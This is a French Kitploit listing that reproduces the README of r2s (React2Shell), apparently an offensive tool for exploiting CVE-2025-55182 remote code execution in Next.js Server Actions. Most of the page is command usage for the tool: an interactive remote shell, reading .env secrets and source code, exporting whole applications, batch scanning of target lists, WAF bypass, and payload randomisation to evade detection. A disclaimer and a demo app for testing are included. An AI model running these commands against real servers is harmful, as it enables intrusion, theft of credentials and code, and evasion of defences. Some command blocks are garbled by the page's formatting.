Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
r2s — Outil avancé de test de sécurité pour l'évaluation de la vulnérabilité CVE-2025-55182 dans les applications Next.js. Fonctionnalités : shell interactif, analyse par lots, contournement WAF, et rapports complets. | Kitploit
Outils/GitHubGitHub/zamdevio/r2s
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsContournement de WAFTests d'IntrusionCommandement et Contrôle
GitHubzamdevio/r2s

r2s

Outil avancé de test de sécurité pour l'évaluation de la vulnérabilité CVE-2025-55182 dans les applications Next.js. Fonctionnalités : shell interactif, analyse par lots, contournement WAF, et rapports complets.

2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
Site web

React2Shell (R2S) - Outil de Test CVE-2025-55182

Bannière R2S Python Licence

Outil avancé de test d'exploitation pour l'évaluation de la vulnérabilité CVE-2025-55182

Fonctionnalités • Installation • Utilisation • Environnement de test • Juridique


📖 Qu'est-ce que R2S ?

R2S (React2Shell) est un outil de test de sécurité conçu pour aider les chercheurs en sécurité, les développeurs et les testeurs d'intrusion à évaluer si leurs applications Next.js sont vulnérables à CVE-2025-55182.

Comprendre CVE-2025-55182

CVE-2025-55182 est une vulnérabilité critique affectant les Server Actions de Next.js dans certaines versions (par exemple, 16.0.5). Cette vulnérabilité permet aux attaquants d'exécuter des commandes arbitraires sur le serveur via des Server Actions mal sécurisées, entraînant une exécution de code à distance (RCE).

R2S vous aide à vérifier si votre application présente ce problème afin que vous puissiez le corriger avant que des acteurs malveillants ne le découvrent.


⚠️ Remarques importantes

Option de commandes Windows (--windows)

⚠️ AVERTISSEMENT CRITIQUE : L'option --windows peut entraîner l'ÉCHEC de la détermination de la vulnérabilité si elle est utilisée incorrectement.

  • Comportement par défaut : L'outil utilise les commandes Unix/Linux (la plupart des serveurs Next.js fonctionnent sous Linux)
  • Quand utiliser --windows : Uniquement si vous êtes certain à 100 % que le serveur cible est Windows
  • Conséquences en cas d'erreur : Si vous utilisez --windows sur un serveur Linux, les commandes échoueront et l'outil pourrait signaler « non vulnérable » même si le serveur l'est
  • Meilleure pratique : Laissez l'outil détecter automatiquement la plateforme, ou n'utilisez pas --windows sauf si vous savez que la cible est Windows

Exemple :```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---

## ⚠️ Avis de non-responsabilité légal

**IMPORTANT : LISEZ CECI AVANT D'UTILISER CET OUTIL**

1. **Cet outil est destiné UNIQUEMENT aux tests de sécurité LÉGITIMES**
   - ✅ Testez vos propres applications
   - ✅ Testez les applications pour lesquelles vous avez une autorisation écrite
   - ✅ Fins éducatives et recherche en sécurité
   - ❌ **NE JAMAIS utiliser sur des systèmes que vous ne possédez pas ou sans autorisation**
   - ❌ **NE JAMAIS utiliser à des fins malveillantes**

2. **En utilisant cet outil, vous acceptez que :**
   - Vous ne l'utiliserez que sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite
   - Vous comprenez que l'accès non autorisé à des systèmes informatiques est illégal
   - Vous assumez l'entière responsabilité de vos actions
   - Les auteurs ne sont pas responsables d'une quelconque utilisation abusive de cet outil

3. **Conséquences légales :**
   - L'accès non autorisé à des systèmes informatiques est un crime dans la plupart des pays
   - Vous pourriez faire face à des poursuites pénales, des amendes et une peine d'emprisonnement
   - Obtenez toujours une autorisation écrite avant de tester

4. **Cet outil est fourni « EN L'ÉTAT » sans garantie d'aucune sorte**

**Si vous avez moins de 18 ans, assurez-vous d'avoir une supervision adulte et une autorisation avant d'utiliser cet outil.**

---

## ✨ Fonctionnalités

### Capacités principales
- 🔍 **Détection de vulnérabilités** - Testez rapidement si un serveur est vulnérable à CVE-2025-55182
- 💻 **Shell interactif** - Session shell interactive complète via HTTPS avec historique des commandes
- 📁 **Opérations sur les fichiers** - Liste des répertoires, lecture de fichiers et exportation de fichiers/archives
- 🔐 **Extraction de secrets** - Tente de lire les secrets d'application (fichiers .env, fichiers de configuration)
- 📄 **Extraction de code** - Tente de lire le code source de l'application
- 🖥️ **Informations système** - Récupère les informations sur l'OS, le nom d'hôte, l'utilisateur et les variables d'environnement

### Fonctionnalités avancées
- 🚀 **Auto-Warming Payloads** - Optimise automatiquement les charges utiles pour de meilleurs résultats
- ⚡ **Exécution parallèle** - Exécutez plusieurs commandes simultanément
- 🎲 **Randomisation des charges utiles** - Évitez la détection avec des charges utiles dynamiques
- 🛠️ **Modules d'exploitation** - Système de modules de style Metasploit (env_dump, file_search, network_scan, process_list)
- 🔄 **Gestion des redirections** - Suit automatiquement les redirections HTTP (301, 302, 303, 307, 308)
- 🎨 **Interface utilisateur élégante** - Sortie codée en couleur pour une lecture facile
- 📊 **Rapports complets** - Enregistrement automatique des rapports aux formats JSON, HTML, TXT avec des formateurs spécifiques aux opérations
- ⚙️ **Système de configuration** - Configuration basée sur JSON avec panneau de paramètres interactif
- 📦 **Fonction d'exportation** - Exportez des fichiers individuels ou des répertoires entiers d'applications sous forme d'archives zip
- 🔒 **Contournement WAF** - Multiples techniques de contournement (⚠️ Non garanti - voir limitations ci-dessous)

### Rapports et journalisation
- 📝 **Enregistrement automatique des rapports** - Enregistre automatiquement les rapports dans `~/.r2s/reports/` avec des horodatages lisibles
- 📋 **Formats spécifiques aux opérations** - Différents formats de rapport pour différentes opérations (shell, test, secrets, etc.)
- 📜 **Historique des commandes** - Historique persistant des commandes sauvegardé dans `~/.r2s/history`
- 🔍 **Pistes d'audit** - Journalisation détaillée de toutes les opérations dans `~/.r2s/logs/audit.log`
- 🎨 **Rapports HTML** - Beaux rapports HTML avec mode sombre/clair, boutons de copie et blocs de code

---

## 📦 Installation

### Option 1 : Compilation à partir des sources (Recommandée)

1. **Clonez le dépôt :**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. Installer les dépendances: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. Construire le binaire autonome: ```bash ./build.sh
    root@kitploit:~
  3. Installation sur le système (facultatif): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. Nettoyer les artefacts de construction (optionnel) : ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

Option 2 : Utiliser le script Python directement```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---

## 🚀 Démarrage rapide

### Test de vulnérabilité de base```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ Important : N'utilisez pas --windows à moins d'être certain que la cible est Windows. Utiliser --windows sur un serveur Linux entraînera des faux négatifs (l'outil peut indiquer « non vulnérable » même si le serveur est vulnérable).

Test avec la démo en ligne

Nous fournissons un environnement de test sécurisé sur https://r2s-arena.fly.dev :```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### Tester localement

Voir [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) pour les instructions pour exécuter l'application vulnérable localement.

---

## 📚 Exemples d'utilisation

### Référence rapide des commandes

**Commandes les plus courantes :**
- `r2s -u URL -t` - Test de vulnérabilité (le plus courant)
- `r2s -u URL --shell` - Démarrer le shell interactif
- `r2s --targets FILE -t` - Analyse par lots de plusieurs cibles
- `r2s -u URL --system-info` - Obtenir les informations système
- `r2s -u URL --secrets` - Tenter de lire les secrets
- `r2s -u URL --export-archive` - Exporter toute l'application en zip

**⚠️ Rappel** : N'utilisez pas `--windows` sauf si la cible est Windows !

---

### Opérations de base```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

Shell interactif```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### Modules d'exploitation```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

Fonctionnalité d'exportation```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### Secrets et extraction de code```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

Scan par lots (Cibles multiples)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### Options avancées```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

Options de proxy et réseau```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### Journalisation & Audit```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

Paramètres & Configuration```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### Rapports```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 Cas d'utilisation courants

1. Tester votre propre application```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. Audit de sécurité```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. Tests pédagogiques

Utilisez l'application nextjs fournie pour des tests locaux sécurisés :```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
Voir [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) pour des instructions détaillées.

---

## 🏗️ Architecture

R2S utilise une architecture modulaire pour la maintenabilité et l'extensibilité :```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

Voir react2shell/README.md pour la documentation détaillée de l'architecture.


🧪 Environnement de test

Nous fournissons un environnement de test sécurisé appelé nextjs que vous pouvez utiliser pour tester l'outil sans risquer des systèmes réels.

Démo en ligne

Visitez : https://r2s-arena.fly.dev

Il s'agit d'une application publique, intentionnellement vulnérable, destinée uniquement aux tests.

Test local

Voir nextjs/README.md pour les instructions d'exécution locale.

⚠️ Important : L'application nextjs est intentionnellement vulnérable et ne doit JAMAIS être utilisée en production ou avec des données réelles.


📖 Référence des commandes

Commandes de base

Commandes d'exportation

CommandeDescription
--export FILE, --ex FILEExporter un seul fichier de la cible (sauvegardé dans ~/.r2s/exports/{domain}/)
--export-archiveExporter tout le répertoire de l'application sous forme d'archive zip. Crée le zip sur le serveur, le télécharge, puis le supprime du serveur. Exclut les motifs .gitignore. Sauvegardé dans ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Commandes de module

CommandeDescription
--module NAMEExécuter le module d'exploitation
--module-list, --list-modules

Options avancées

Options de rapport

OptionDescription
--output FILE, -o FILE

Options réseau et proxy

Options de traitement par lots et d'automatisation

OptionDescription
--targets FILEAnalyser plusieurs cibles depuis un fichier (une URL par ligne, prend en charge les commentaires avec #)
--batchMode batch : ignorer toutes les invites interactives, continuer automatiquement (utile pour l'automatisation/scripts)

Commandes spéciales

CommandeDescription
r2s settingsOuvrir le panneau de paramètres interactif

🔧 Dépannage

« Erreur SSL »```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "Erreur de connexion"
- Vérifiez si le serveur est en cours d'exécution
- Vérifiez que l'URL est correcte
- Vérifiez les paramètres du pare-feu
- Essayez d'augmenter le délai d'attente : `--timeout 30`

### "Requête bloquée"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"Impossible de déterminer la vulnérabilité" ou faux négatifs

⚠️ IMPORTANT : Drapeau des commandes Windows

Si vous obtenez des faux négatifs (l'outil indique "non vulnérable" alors que la cible l'est effectivement), vérifiez :

  1. Avez-vous utilisé le drapeau --windows ?

    • Le drapeau --windows fait utiliser à l'outil des commandes Windows (PowerShell, dir, etc.)
    • Si votre cible est Unix/Linux (la plupart des serveurs Next.js le sont), utiliser --windows fera ÉCHOUER l'outil
    • L'outil tentera d'exécuter des commandes Windows sur un serveur Linux, ce qui échouera
    • Solution : Supprimez le drapeau --windows (Unix/Linux est la valeur par défaut)
  2. Détection de plateforme

    • L'outil détecte automatiquement la plateforme, mais vous pouvez la surcharger
    • Utilisez --windows uniquement si vous êtes sûr à 100 % que la cible est Windows
    • La plupart des déploiements Next.js se font sur des systèmes Linux/Unix
  3. Commande de test

    • Le test par défaut utilise la commande Unix : echo $((41*271))
    • Avec --windows, il utilise : powershell -c "41*271"
    • Si le serveur est Linux mais que vous utilisez des commandes Windows, le test échouera

Exemple du problème :```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### Limites du contournement WAF

**⚠️ Important :** Les techniques de contournement WAF de cet outil ne sont **PAS garanties** de fonctionner et présentent plusieurs limitations :

- **Non universel** : Différents WAF utilisent différentes méthodes de détection. Ce qui fonctionne pour l'un peut ne pas fonctionner pour un autre.
- **Détection statique** : Certains WAF utilisent une correspondance de motifs statique qui peut être contournée, mais les WAF modernes utilisent l'analyse comportementale.
- **Limitation de débit** : De nombreux WAF implémentent une limitation de débit qui peut bloquer les tentatives répétées.
- **Apprentissage automatique** : Les WAF avancés utilisent des modèles de ML qui s'adaptent et apprennent des schémas d'attaque.
- **Cloudflare/AWS WAF** : Les WAF de niveau entreprise (Cloudflare, AWS WAF, etc.) sont extrêmement difficiles à contourner.
- **Aucune garantie** : Les techniques de contournement sont expérimentales et peuvent échouer face à des WAF bien configurés.

**Bonnes pratiques :**
- Utilisez le contournement WAF en dernier recours
- Essayez différentes stratégies d'en-tête (`--header-strategy`)
- Combinez avec `--randomize` pour de meilleurs résultats
- Comprenez que certaines cibles peuvent être impossibles à contourner
- Testez toujours sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester

### Problèmes de compilation```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

Nettoyage des artefacts de build

Pour supprimer en toute sécurité tous les artefacts de build (répertoires de build, fichiers cache, etc.) :```bash ./build.sh cleanup

root@kitploit:~
Cela supprimera :
- `build/` directory (fichiers de compilation PyInstaller)
- `dist/` directory (binaires compilés)
- `__pycache__/` directories (cache Python, récursivement)
- `*.pyc` files (bytecode Python compilé)
- `*.pyo` files (bytecode Python optimisé)
- `*.spec` files (fichiers de spécification PyInstaller)

**Remarque :** Cela ne supprime que les artefacts de compilation, pas votre code source. Le nettoyage est sûr et demandera une confirmation avant de procéder.

---

## 📁 Structure des fichiers```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 Contribuer

Les contributions sont les bienvenues ! Veuillez :

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité
  3. Apporter vos modifications
  4. Soumettre une pull request

Rappel : Ne contribuez que du code qui aide aux tests de sécurité légitimes.


📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Toutefois, l'utilisation de cet outil est soumise à la clause de non-responsabilité légale ci-dessus. Utiliser cet outil pour un accès non autorisé est illégal et n'est pas couvert par cette licence.


👨‍💻 Développeur

zamdevio

  • GitHub : https://github.com/zamdevio
  • Dépôt du projet : https://github.com/zamdevio/r2s

🙏 Remerciements

  • Chercheurs en sécurité qui ont découvert CVE-2025-55182
  • La communauté de sécurité open-source
  • Tous les contributeurs à ce projet

📞 Assistance

  • Problèmes : GitHub Issues
  • Sécurité : Signalez les problèmes de sécurité de manière responsable

⚠️ Rappel final

Cet outil est destiné UNIQUEMENT à des tests de sécurité et à des fins éducatives.

  • ✅ Obtenez toujours l'autorisation avant de tester
  • ✅ Testez uniquement les systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester
  • ✅ Utilisez-le de manière responsable et éthique
  • ❌ Ne l'utilisez jamais à des fins malveillantes
  • ❌ Ne testez jamais de systèmes sans autorisation

Restez légal, restez éthique, restez en sécurité ! 🛡️


Fait avec ❤️ pour la communauté de la sécurité

⬆ Retour en haut

Télécharger l’outil
CommandeDescription
-u, --url URLURL cible (requise pour la plupart des opérations)
-t, --testTester si le serveur est vulnérable
-ld, --list-dir PATHLister le contenu du répertoire
-rf, --read-file FILELire le contenu du fichier
-si, --system-infoObtenir des informations système
-sr, --secretsTenter de lire les secrets
-c, --codeTenter de lire le code source
-cmd, --command CMDExécuter une commande personnalisée
--shellDémarrer un shell interactif
Lister les modules disponibles
--module-info NAMEAfficher les informations du module
--set KEY=VALUEDéfinir l'option du module
OptionDescription
--waf-bypassEssayer les techniques de contournement WAF (⚠️ Non garanti - voir limitations ci-dessous)
--waf-bypass-size KBTaille des données indésirables pour le contournement WAF en Ko (défaut : 128)
--vercel-waf-bypassActiver les techniques de contournement WAF spécifiques à Vercel
--header-strategy STRATEGYStratégie d'en-tête HTTP : default, chrome_latest, firefox, minimal, assetnote
--parallel NExécuter N commandes en parallèle (utile pour plusieurs commandes)
--auto-warmPréchauffer et optimiser automatiquement les charges utiles avant exécution
--randomizeRandomiser les charges utiles pour échapper à la détection statique
--no-follow-redirectsNe pas suivre automatiquement les redirections HTTP (301, 302, etc.)
-k, --insecureDésactiver la vérification du certificat SSL (à utiliser avec prudence)
--timeout SECONDSDélai d'attente de la requête en secondes (défaut : 10, utiliser 0 pour aucun délai)
--windows⚠️ AVERTISSEMENT : Utiliser des commandes Windows au lieu d'Unix/Linux. Cela peut entraîner l'ÉCHEC de la détermination de la vulnérabilité si la cible est en réalité Unix/Linux. Utilisez cette option uniquement si vous êtes certain que la cible est Windows.
--rate RATELimiter les requêtes à RATE requêtes par seconde (utile pour les analyses par lots)
--delay SECONDSAjouter un délai entre les requêtes en secondes (aide à éviter les limitations de débit)
--batchMode batch : ignorer toutes les invites interactives, continuer automatiquement (utile pour l'automatisation)
Enregistrer les résultats dans un fichier spécifique (désactive la sauvegarde automatique)
--no-reportDésactiver l'enregistrement automatique du rapport dans ~/.r2s/reports/
--log FILEJournaliser toutes les opérations dans le fichier spécifié (journal détaillé des opérations)
--auditCréer une piste d'audit détaillée (sauvegardée dans ~/.r2s/logs/audit.log)
OptionDescription
--proxy URLUtiliser un proxy HTTP (format : http://proxy:port ou http://user:pass@proxy:port)
--proxy-file FILECharger et alterner les proxys depuis un fichier (un proxy par ligne, format : http://proxy:port)
--rate RATELimiter les requêtes à RATE requêtes par seconde (évite de submerger la cible)
--delay SECONDSAjouter un délai entre les requêtes en secondes (aide à éviter les limitations de débit)
r2s cleanup
Supprimer toutes les données R2S (configuration, historique, journaux, rapports, exportations)
r2s uninstallDésinstaller le binaire R2S et toutes les données
r2s helpAfficher le message d'aide